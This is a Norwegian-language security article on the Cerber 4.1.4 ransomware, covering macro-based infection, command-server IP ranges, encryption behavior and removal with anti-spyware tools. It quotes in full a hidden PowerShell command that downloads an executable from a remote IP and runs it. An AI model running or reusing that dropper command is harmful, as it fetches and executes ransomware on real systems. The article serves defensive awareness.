Terroren fortsetter – Cerber 4.1.4 er lansert
Cerber 4.1.4 er det nyeste tilskuddet til Cerber-familien. Det ser ut til at mindre enn en uke har gått siden hackerne har slått til med Cerber 4.1.0 og Cerber 4.1.1. De har kanskje sett på det som et svakt angrep, og har derfor forsterket det med et annet ransomware i samme serie. Som forgjengerne legger det til filendelser med vilkårlige tegn. Den nyeste versjonen stjeler noen tips fra Locky ransomware, ettersom det har endret aktiveringen til en som ligner på denne filkrypterende malware-trusselen. Cerber 4.1.4 benytter et word-dokument og ber brukeren om å aktivere macro-innstillinger for å laste ned den kjørbare filen. Denne teknikken, som kontinuerlig er blitt brukt av Locky, er allerede diskutert av IT-eksperter. De som følger trendene i IT-verdenen kan dermed klare å unnslippe denne trusselen. Hvis du har blitt infisert er det imidlertid ingen grunn til å få panikk. Først må du fjerne Cerber 4.1.4 fra enheten din. Bruk FortectIntego for å fremskynde prosessen.
Den nyere versjonen av ransomware-trusselen fortsetter å skape problemer over hele verden. Som med 4.1.+ og 4.1.1-versjonene, benytter det IP-adresser til å sende UDP-pakker til den eksterne kontrollserveren. Den nyeste versjonen har avansert til å bruke tre sett av IP-adresser, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, for å overføre teknisk informasjon til serveren. Dette gjør det mulig for hackerne å innhente mer viktig informasjon om offerets enheter og operativsystemer. Det sier seg selv at slike data inspirerer de nettkriminelle til å forbedre strategiene sine ytterligere.

Den mest unike egenskapen til denne nye versjonen er måten det utfører angrepene sine på. Mens ulike versjoner av dette filkrypterende viruset allerede har benyttet søppelmeldinger og falske fakturaer for å angripe offerets system, har denne utgaven gått over til en strategi som involverer makroer. Når et offer åpner den mottatte .doc-filen vil han eller hun se en rekke vilkårlige tegn og koder i dokumentet. De nyeste versjonene i word deaktiverer makroer som standard, og du blir derfor bedt om å aktivere dem. Etter at innstillingene er endret kjøres programmet PowerShell. Innen sekunder starter aktiveringsprosessen, som avsluttes med følgende linje:
POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,»$env:APPDATA\winx64.exe»);Start-Process («$env:APPDATA\winx64.exe»)
Denne kommandoen ble utført for å kunne laste ned og kjøre hovedelement win64.exe. Hvis du kjører et 32-bits Windows-system kan den kjørbare filen være win32.exe. Viruset trenger deretter å plassere filen i %AppData%-mappen for å oppnå full effektivitet. Mens viruset krypterer filene kan du som vanlig oppdage filen Readme.hta på skrivebordet. Når krypteringsprosessen er fullført endres bakgrunnsbildet ditt til denne meldingen for å varsle om at Cerber 4.1.4 har kapret systemet ditt. Ved å benytte MachineGuid-verdien i HKLM\Software\Microsoft\Cryptography-mappen på offerets datamaskin, genererer det en vilkårlig utvidelse. Ikke kast bort tiden din og fjern Cerber 4.1.4 snarest.
Distribusjonsmetoder
Dette viruset benytter verifiserte strategier for distribusjon – søppelpost. Selv om brukere kontinuerlig blir advart om ikke å åpne fakturaer, offentlige skjemaer eller advarsler fra ukjente sendere, er fremdeles antall infiserte brukere mange. Nettkriminelle har finpusset på teknikken for å overbevise brukere til å gjøre som du vil. Hvis du ser en melding fra FBI eller et skattekontor bør du imidlertid kontrollere at senderen er den som står før du åpner eventuelle vedlegg. Du kan dessuten se etter gramatikkfeil eller skrivefeil. Manglende logo kan også være et varselsignal.
Er det mulig å fjerne viruset fullstendig?
Når det gjelder Cerber 4.1.4, anbefaler vi at du installerer et pålitelig sikkerhetsprogram. Oppdater det etter installasjon og start deretter skannet. Antispyware-programmer som FortectIntego eller MalwarebytesMalwarebytes kan normalt fjerne Cerber 4.1.4-viruset i løpet av få minutter. Hvis du har et håp om at de kan dekryptere filene dine vil du imidlertid bli skuffet. Det finnes heldigvis andre metoder for å gjøre dette. Den mest effektive metoden for å gjenopprette filer er å benytte sikkerhetskopier eller det originale dekrypteringsprogrammet. Les videre for å få råd om dette. Hvis viruset har låst skjermen din eller du ikke klarer å benytte vanlige systemfunksjoner kan du benytte disse retningslinjene for å få tilbake tilgangen.
Hjalp denne guiden?
Vær den første til å kommentere